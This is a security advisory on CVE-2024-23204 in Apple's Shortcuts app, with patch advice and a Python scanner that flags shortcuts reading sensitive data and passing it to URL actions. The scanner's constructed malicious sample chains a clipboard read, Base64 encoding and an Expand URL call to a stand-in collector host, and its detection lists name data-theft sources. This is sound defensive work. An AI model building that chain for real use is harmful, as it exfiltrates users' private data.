Summary:
A high-severity vulnerability (CVSS 7.5), tracked as CVE-2024-23204, has been discovered and patched in Apple's Shortcuts app on iOS, iPadOS, macOS, and watchOS. A maliciously crafted shortcut could read sensitive user data without the permission prompt that normally gates such access, then abuse the "Expand URL" action to send that data, Base64-encoded inside the URL, to a remote server. Photos, contacts, files, and clipboard contents could be exfiltrated this way and stored on an attacker-controlled server for follow-on use. Because shortcuts are designed to be exported and shared, a user can unwittingly import and run a malicious one, which widens the reach of the flaw and makes it a serious privacy and data-security risk.
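The chain described above (sensitive-data action, Base64 Encode, then a URL action whose address is built at runtime from the encoded output) is visible in the workflow's action list, so it can be triaged statically before a shared shortcut is imported. The scanner below is an added example written for this page, not Apple's code or code from the researchers who reported the flaw. It assumes the workflow plist layout and the action identifiers named in the constants (taken from inspecting unsigned .shortcut exports; verify them against your own samples), and it does not unwrap the signed export format, so feed it the inner plist. The two sample workflows are constructed inline, not captured from a real attack.

```python
"""Static triage of a Shortcuts workflow plist for the exfiltration pattern:
sensitive-data source -> Base64 Encode -> Expand URL (or another URL-fetching
action) whose URL interpolates a variable.

Added example for this page; not Apple's or any vendor's code.  The action
identifiers below are assumptions based on unsigned .shortcut exports."""
import plistlib
from typing import Any, Optional
from urllib.parse import urlsplit

# Assumed identifiers: verify against your own samples before depending on them.
SENSITIVE_SOURCES = {
    "is.workflow.actions.getclipboard": "clipboard",
    "is.workflow.actions.selectphoto": "photos",
    "is.workflow.actions.getlatestphotos": "photos",
    "is.workflow.actions.contacts": "contacts",
    "is.workflow.actions.documentpicker.open": "files",
}
ENCODERS = {"is.workflow.actions.base64encode"}
NETWORK_SINKS = {
    "is.workflow.actions.url.expand": "Expand URL",
    "is.workflow.actions.downloadurl": "Get Contents of URL",
}
# Shortcuts marks an interpolated variable in a text token with U+FFFC and an
# "attachmentsByRange" map describing what fills that position at run time.
VARIABLE_PLACEHOLDER = "\ufffc"


def _walk(value: Any):
    """Yield every nested value in a parameter tree (dicts and lists)."""
    yield value
    if isinstance(value, dict):
        for v in value.values():
            yield from _walk(v)
    elif isinstance(value, list):
        for v in value:
            yield from _walk(v)


def _interpolated_urls(params: dict) -> list:
    """URL-looking strings in the parameters that contain a variable placeholder."""
    return [v for v in _walk(params)
            if isinstance(v, str) and v.startswith(("http://", "https://"))
            and VARIABLE_PLACEHOLDER in v]


def _has_attachments(params: dict) -> bool:
    """True if any text token in the parameters references another value."""
    return any(isinstance(v, dict) and v.get("attachmentsByRange") for v in _walk(params))


def triage_shortcut(plist_bytes: bytes) -> dict:
    """Return {"verdict": "clean"|"suspicious", "findings": [...]} for one workflow."""
    workflow = plistlib.loads(plist_bytes)
    actions = workflow.get("WFWorkflowActions", [])
    sources_seen, encoded, findings = [], False, []
    for index, action in enumerate(actions):
        ident = action.get("WFWorkflowActionIdentifier", "")
        params = action.get("WFWorkflowActionParameters") or {}
        if ident in SENSITIVE_SOURCES:
            sources_seen.append(SENSITIVE_SOURCES[ident])
        elif ident in ENCODERS:
            encoded = True
        elif ident in NETWORK_SINKS:
            urls = _interpolated_urls(params)
            # A URL action only matters once it can carry earlier data out:
            # something sensitive was read before it and its URL is dynamic.
            if sources_seen and (urls or _has_attachments(params)):
                findings.append({
                    "action_index": index,
                    "sink": NETWORK_SINKS[ident],
                    "sources": list(sources_seen),
                    "base64_encoded": encoded,
                    "host": urlsplit(urls[0]).hostname if urls else None,
                })
    return {"verdict": "suspicious" if findings else "clean", "findings": findings}


def _action(ident: str, params: Optional[dict] = None) -> dict:
    return {"WFWorkflowActionIdentifier": ident,
            "WFWorkflowActionParameters": params or {}}


def _text_token(literal: str, output_name: str) -> dict:
    """A WFTextTokenString whose trailing placeholder references a prior output."""
    return {"WFSerializationType": "WFTextTokenString",
            "Value": {"string": literal + VARIABLE_PLACEHOLDER,
                      "attachmentsByRange": {f"{{{len(literal)}, 1}}": {
                          "Type": "ActionOutput", "OutputName": output_name}}}}


# Constructed samples (not real captured shortcuts).
MALICIOUS_PLIST = plistlib.dumps({"WFWorkflowActions": [
    _action("is.workflow.actions.getclipboard"),
    _action("is.workflow.actions.base64encode"),
    _action("is.workflow.actions.url.expand",
            {"WFInput": _text_token("https://collector.example.invalid/?d=",
                                    "Base64 Encoded")}),
]})
BENIGN_PLIST = plistlib.dumps({"WFWorkflowActions": [
    _action("is.workflow.actions.url.expand", {"WFInput": "https://t.co/abc"}),
]})

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_PLIST), ("benign", BENIGN_PLIST)):
        print(name, triage_shortcut(blob))
```

The ordering check is deliberately loose: it flags any dynamic URL action that follows a sensitive read, whether or not Base64 Encode sits between them, because the encoding step is a convenience for the attacker rather than a requirement. Expect benign shortcuts that legitimately post clipboard text to a web service to trip it too; treat the output as a review queue, not a verdict.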
Recommendations:
Install the Apple updates that address CVE-2024-23204 (iOS 17.3, iPadOS 17.3, macOS Sonoma 14.3, and watchOS 10.3, which add the missing permission checks). Until devices are updated, do not import shortcuts from untrusted sources, and review any shared shortcut for actions that read clipboard, photo, contact, or file data and then pass it to a URL-handling action.
References:
The following reports contain further technical details:
https://thehackernews.com/2024/02/researchers-detail-apples-recent-zero.html